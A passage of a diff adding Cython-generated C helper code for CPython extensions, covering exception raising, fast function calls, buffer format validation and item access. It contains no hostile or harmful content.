Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* ExtTypeTest */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type) { + __Pyx_TypeName obj_type_name; + __Pyx_TypeName type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + if (likely(__Pyx_TypeCheck(obj, type))) + return 1; + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_TypeError, + "Cannot convert " __Pyx_FMT_TYPENAME " to " __Pyx_FMT_TYPENAME, + obj_type_name, type_name); + __Pyx_DECREF_TypeName(obj_type_name); + __Pyx_DECREF_TypeName(type_name); + return 0; +} + +/* IsLittleEndian */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void) +{ + union { + uint32_t u32; + uint8_t u8[4]; + } S; + S.u32 = 0x01020304; + return S.u8[0] == 4; +} + +/* BufferFormatCheck */ +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type) { + stack[0].field = &ctx->root; + stack[0].parent_offset = 0; + ctx->root.type = type; + ctx->root.name = "buffer dtype"; + ctx->root.offset = 0; + ctx->head = stack; + ctx->head->field = &ctx->root; + ctx->fmt_offset = 0; + ctx->head->parent_offset = 0; + ctx->new_packmode = '@'; + ctx->enc_packmode = '@'; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->is_complex = 0; + ctx->is_valid_array = 0; + ctx->struct_alignment = 0; + while (type->typegroup == 'S') { + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = 0; + type = type->fields->type; + } +} +static int __Pyx_BufFmt_ParseNumber(const char** ts) { + int count; + const char* t = *ts; + if (*t < '0' || *t > '9') { + return -1; + } else { + count = *t++ - '0'; + while (*t >= '0' && *t <= '9') { + count *= 10; + count += *t++ - '0'; + } + } + *ts = t; + return count; +} +static int __Pyx_BufFmt_ExpectNumber(const char **ts) { + int number = __Pyx_BufFmt_ParseNumber(ts); + if (number == -1) + PyErr_Format(PyExc_ValueError,\ + "Does not understand character buffer dtype format string ('%c')", **ts); + return number; +} +static void __Pyx_BufFmt_RaiseUnexpectedChar(char ch) { + PyErr_Format(PyExc_ValueError, + "Unexpected format string character: '%c'", ch); +} +static const char* __Pyx_BufFmt_DescribeTypeChar(char ch, int is_complex) { + switch (ch) { + case '?': return "'bool'"; + case 'c': return "'char'"; + case 'b': return "'signed char'"; + case 'B': return "'unsigned char'"; + case 'h': return "'short'"; + case 'H': return "'unsigned short'"; + case 'i': return "'int'"; + case 'I': return "'unsigned int'"; + case 'l': return "'long'"; + case 'L': return "'unsigned long'"; + case 'q': return "'long long'"; + case 'Q': return "'unsigned long long'"; + case 'f': return (is_complex ? "'complex float'" : "'float'"); + case 'd': return (is_complex ? "'complex double'" : "'double'"); + case 'g': return (is_complex ? "'complex long double'" : "'long double'"); + case 'T': return "a struct"; + case 'O': return "Python object"; + case 'P': return "a pointer"; + case 's': case 'p': return "a string"; + case 0: return "end"; + default: return "unparsable format string"; + } +} +static size_t __Pyx_BufFmt_TypeCharToStandardSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return 2; + case 'i': case 'I': case 'l': case 'L': return 4; + case 'q': case 'Q': return 8; + case 'f': return (is_complex ? 8 : 4); + case 'd': return (is_complex ? 16 : 8); + case 'g': { + PyErr_SetString(PyExc_ValueError, "Python does not define a standard format string size for long double ('g').."); + return 0; + } + case 'O': case 'P': return sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static size_t __Pyx_BufFmt_TypeCharToNativeSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(short); + case 'i': case 'I': return sizeof(int); + case 'l': case 'L': return sizeof(long); + #ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(PY_LONG_LONG); + #endif + case 'f': return sizeof(float) * (is_complex ? 2 : 1); + case 'd': return sizeof(double) * (is_complex ? 2 : 1); + case 'g': return sizeof(long double) * (is_complex ? 2 : 1); + case 'O': case 'P': return sizeof(void*); + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +typedef struct { char c; short x; } __Pyx_st_short; +typedef struct { char c; int x; } __Pyx_st_int; +typedef struct { char c; long x; } __Pyx_st_long; +typedef struct { char c; float x; } __Pyx_st_float; +typedef struct { char c; double x; } __Pyx_st_double; +typedef struct { char c; long double x; } __Pyx_st_longdouble; +typedef struct { char c; void *x; } __Pyx_st_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { char c; PY_LONG_LONG x; } __Pyx_st_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToAlignment(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_st_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_st_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_st_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_st_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_st_float) - sizeof(float); + case 'd': return sizeof(__Pyx_st_double) - sizeof(double); + case 'g': return sizeof(__Pyx_st_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_st_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +/* These are for computing the padding at the end of the struct to align + on the first member of the struct. This will probably the same as above, + but we don't have any guarantees. + */ +typedef struct { short x; char c; } __Pyx_pad_short; +typedef struct { int x; char c; } __Pyx_pad_int; +typedef struct { long x; char c; } __Pyx_pad_long; +typedef struct { float x; char c; } __Pyx_pad_float; +typedef struct { double x; char c; } __Pyx_pad_double; +typedef struct { long double x; char c; } __Pyx_pad_longdouble; +typedef struct { void *x; char c; } __Pyx_pad_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { PY_LONG_LONG x; char c; } __Pyx_pad_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToPadding(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_pad_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_pad_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_pad_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_pad_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_pad_float) - sizeof(float); + case 'd': return sizeof(__Pyx_pad_double) - sizeof(double); + case 'g': return sizeof(__Pyx_pad_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_pad_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static char __Pyx_BufFmt_TypeCharToGroup(char ch, int is_complex) { + switch (ch) { + case 'c': + return 'H'; + case 'b': case 'h': case 'i': + case 'l': case 'q': case 's': case 'p': + return 'I'; + case '?': case 'B': case 'H': case 'I': case 'L': case 'Q': + return 'U'; + case 'f': case 'd': case 'g': + return (is_complex ? 'C' : 'R'); + case 'O': + return 'O'; + case 'P': + return 'P'; + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +static void __Pyx_BufFmt_RaiseExpected(__Pyx_BufFmt_Context* ctx) { + if (ctx->head == NULL || ctx->head->field == &ctx->root) { + const char* expected; + const char* quote; + if (ctx->head == NULL) { + expected = "end"; + quote = ""; + } else { + expected = ctx->head->field->type->name; + quote = "'"; + } + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected %s%s%s but got %s", + quote, expected, quote, + __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex)); + } else { + __Pyx_StructField* field = ctx->head->field; + __Pyx_StructField* parent = (ctx->head - 1)->field; + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected '%s' but got %s in '%s.%s'", + field->type->name, __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex), + parent->type->name, field->name); + } +} +static int __Pyx_BufFmt_ProcessTypeChunk(__Pyx_BufFmt_Context* ctx) { + char group; + size_t size, offset, arraysize = 1; + if (ctx->enc_type == 0) return 0; + if (ctx->head->field->type->arraysize[0]) { + int i, ndim = 0; + if (ctx->enc_type == 's' || ctx->enc_type == 'p') { + ctx->is_valid_array = ctx->head->field->type->ndim == 1; + ndim = 1; + if (ctx->enc_count != ctx->head->field->type->arraysize[0]) { + PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %zu", + ctx->head->field->type->arraysize[0], ctx->enc_count); + return -1; + } + } + if (!ctx->is_valid_array) { + PyErr_Format(PyExc_ValueError, "Expected %d dimensions, got %d", + ctx->head->field->type->ndim, ndim); + return -1; + } + for (i = 0; i < ctx->head->field->type->ndim; i++) { + arraysize *= ctx->head->field->type->arraysize[i]; + } + ctx->is_valid_array = 0; + ctx->enc_count = 1; + } + group = __Pyx_BufFmt_TypeCharToGroup(ctx->enc_type, ctx->is_complex); + do { + __Pyx_StructField* field = ctx->head->field; + __Pyx_TypeInfo* type = field->type; + if (ctx->enc_packmode == '@' || ctx->enc_packmode == '^') { + size = __Pyx_BufFmt_TypeCharToNativeSize(ctx->enc_type, ctx->is_complex); + } else { + size = __Pyx_BufFmt_TypeCharToStandardSize(ctx->enc_type, ctx->is_complex); + } + if (ctx->enc_packmode == '@') { + size_t align_at = __Pyx_BufFmt_TypeCharToAlignment(ctx->enc_type, ctx->is_complex); + size_t align_mod_offset; + if (align_at == 0) return -1; + align_mod_offset = ctx->fmt_offset % align_at; + if (align_mod_offset > 0) ctx->fmt_offset += align_at - align_mod_offset; + if (ctx->struct_alignment == 0) + ctx->struct_alignment = __Pyx_BufFmt_TypeCharToPadding(ctx->enc_type, + ctx->is_complex); + } + if (type->size != size || type->typegroup != group) { + if (type->typegroup == 'C' && type->fields != NULL) { + size_t parent_offset = ctx->head->parent_offset + field->offset; + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = parent_offset; + continue; + } + if ((type->typegroup == 'H' || group == 'H') && type->size == size) { + } else { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + } + offset = ctx->head->parent_offset + field->offset; + if (ctx->fmt_offset != offset) { + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch; next field is at offset %" CYTHON_FORMAT_SSIZE_T "d but %" CYTHON_FORMAT_SSIZE_T "d expected", + (Py_ssize_t)ctx->fmt_offset, (Py_ssize_t)offset); + return -1; + } + ctx->fmt_offset += size; + if (arraysize) + ctx->fmt_offset += (arraysize - 1) * size; + --ctx->enc_count; + while (1) { + if (field == &ctx->root) { + ctx->head = NULL; + if (ctx->enc_count != 0) { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + break; + } + ctx->head->field = ++field; + if (field->type == NULL) { + --ctx->head; + field = ctx->head->field; + continue; + } else if (field->type->typegroup == 'S') { + size_t parent_offset = ctx->head->parent_offset + field->offset; + if (field->type->fields->type == NULL) continue; + field = field->type->fields; + ++ctx->head; + ctx->head->field = field; + ctx->head->parent_offset = parent_offset; + break; + } else { + break; + } + } + } while (ctx->enc_count); + ctx->enc_type = 0; + ctx->is_complex = 0; + return 0; +} +static PyObject * +__pyx_buffmt_parse_array(__Pyx_BufFmt_Context* ctx, const char** tsp) +{ + const char *ts = *tsp; + int i = 0, number, ndim; + ++ts; + if (ctx->new_count != 1) { + PyErr_SetString(PyExc_ValueError, + "Cannot handle repeated arrays in format string"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ndim = ctx->head->field->type->ndim; + while (*ts && *ts != ')') { + switch (*ts) { + case ' ': case '\f': case '\r': case '\n': case '\t': case '\v': continue; + default: break; + } + number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + if (i < ndim && (size_t) number != ctx->head->field->type->arraysize[i]) + return PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %d", + ctx->head->field->type->arraysize[i], number); + if (*ts != ',' && *ts != ')') + return PyErr_Format(PyExc_ValueError, + "Expected a comma in format string, got '%c'", *ts); + if (*ts == ',') ts++; + i++; + } + if (i != ndim) + return PyErr_Format(PyExc_ValueError, "Expected %d dimension(s), got %d", + ctx->head->field->type->ndim, i); + if (!*ts) { + PyErr_SetString(PyExc_ValueError, + "Unexpected end of format string, expected ')'"); + return NULL; + } + ctx->is_valid_array = 1; + ctx->new_count = 1; + *tsp = ++ts; + return Py_None; +} +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts) { + int got_Z = 0; + while (1) { + switch(*ts) { + case 0: + if (ctx->enc_type != 0 && ctx->head == NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + if (ctx->head != NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + return ts; + case ' ': + case '\r': + case '\n': + ++ts; + break; + case '<': + if (!__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Little-endian buffer not supported on big-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '>': + case '!': + if (__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Big-endian buffer not supported on little-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '=': + case '@': + case '^': + ctx->new_packmode = *ts++; + break; + case 'T': + { + const char* ts_after_sub; + size_t i, struct_count = ctx->new_count; + size_t struct_alignment = ctx->struct_alignment; + ctx->new_count = 1; + ++ts; + if (*ts != '{') { + PyErr_SetString(PyExc_ValueError, "Buffer acquisition: Expected '{' after 'T'"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + ctx->enc_count = 0; + ctx->struct_alignment = 0; + ++ts; + ts_after_sub = ts; + for (i = 0; i != struct_count; ++i) { + ts_after_sub = __Pyx_BufFmt_CheckString(ctx, ts); + if (!ts_after_sub) return NULL; + } + ts = ts_after_sub; + if (struct_alignment) ctx->struct_alignment = struct_alignment; + } + break; + case '}': + { + size_t alignment = ctx->struct_alignment; + ++ts; + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + if (alignment && ctx->fmt_offset % alignment) { + ctx->fmt_offset += alignment - (ctx->fmt_offset % alignment); + } + } + return ts; + case 'x': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->fmt_offset += ctx->new_count; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->enc_packmode = ctx->new_packmode; + ++ts; + break; + case 'Z': + got_Z = 1; + ++ts; + if (*ts != 'f' && *ts != 'd' && *ts != 'g') { + __Pyx_BufFmt_RaiseUnexpectedChar('Z'); + return NULL; + } + CYTHON_FALLTHROUGH; + case '?': case 'c': case 'b': case 'B': case 'h': case 'H': case 'i': case 'I': + case 'l': case 'L': case 'q': case 'Q': + case 'f': case 'd': case 'g': + case 'O': case 'p': + if ((ctx->enc_type == *ts) && (got_Z == ctx->is_complex) && + (ctx->enc_packmode == ctx->new_packmode) && (!ctx->is_valid_array)) { + ctx->enc_count += ctx->new_count; + ctx->new_count = 1; + got_Z = 0; + ++ts; + break; + } + CYTHON_FALLTHROUGH; + case 's': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_count = ctx->new_count; + ctx->enc_packmode = ctx->new_packmode; + ctx->enc_type = *ts; + ctx->is_complex = got_Z; + ++ts; + ctx->new_count = 1; + got_Z = 0; + break; + case ':': + ++ts; + while(*ts != ':') ++ts; + ++ts; + break; + case '(': + if (!__pyx_buffmt_parse_array(ctx, &ts)) return NULL; + break; + default: + { + int number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + ctx->new_count = (size_t)number; + } + } + } +} + +/* BufferGetAndValidate */ + static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info) { + if (unlikely(info->buf == NULL)) return; + if (info->suboffsets == __Pyx_minusones) info->suboffsets = NULL; + __Pyx_ReleaseBuffer(info); +} +static void __Pyx_ZeroBuffer(Py_buffer* buf) { + buf->buf = NULL; + buf->obj = NULL; + buf->strides = __Pyx_zeros; + buf->shape = __Pyx_zeros; + buf->suboffsets = __Pyx_minusones; +} +static int __Pyx__GetBufferAndValidate( + Py_buffer* buf, PyObject* obj, __Pyx_TypeInfo* dtype, int flags, + int nd, int cast, __Pyx_BufFmt_StackElem* stack) +{ + buf->buf = NULL; + if (unlikely(__Pyx_GetBuffer(obj, buf, flags) == -1)) { + __Pyx_ZeroBuffer(buf); + return -1; + } + if (unlikely(buf->ndim != nd)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + nd, buf->ndim); + goto fail; + } + if (!cast) { + __Pyx_BufFmt_Context ctx; + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (!__Pyx_BufFmt_CheckString(&ctx, buf->format)) goto fail; + } + if (unlikely((size_t)buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "d byte%s) does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "d byte%s)", + buf->itemsize, (buf->itemsize > 1) ? "s" : "", + dtype->name, (Py_ssize_t)dtype->size, (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->suboffsets == NULL) buf->suboffsets = __Pyx_minusones; + return 0; +fail:; + __Pyx_SafeReleaseBuffer(buf); + return -1; +} + +/* GetItemInt */ + static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + 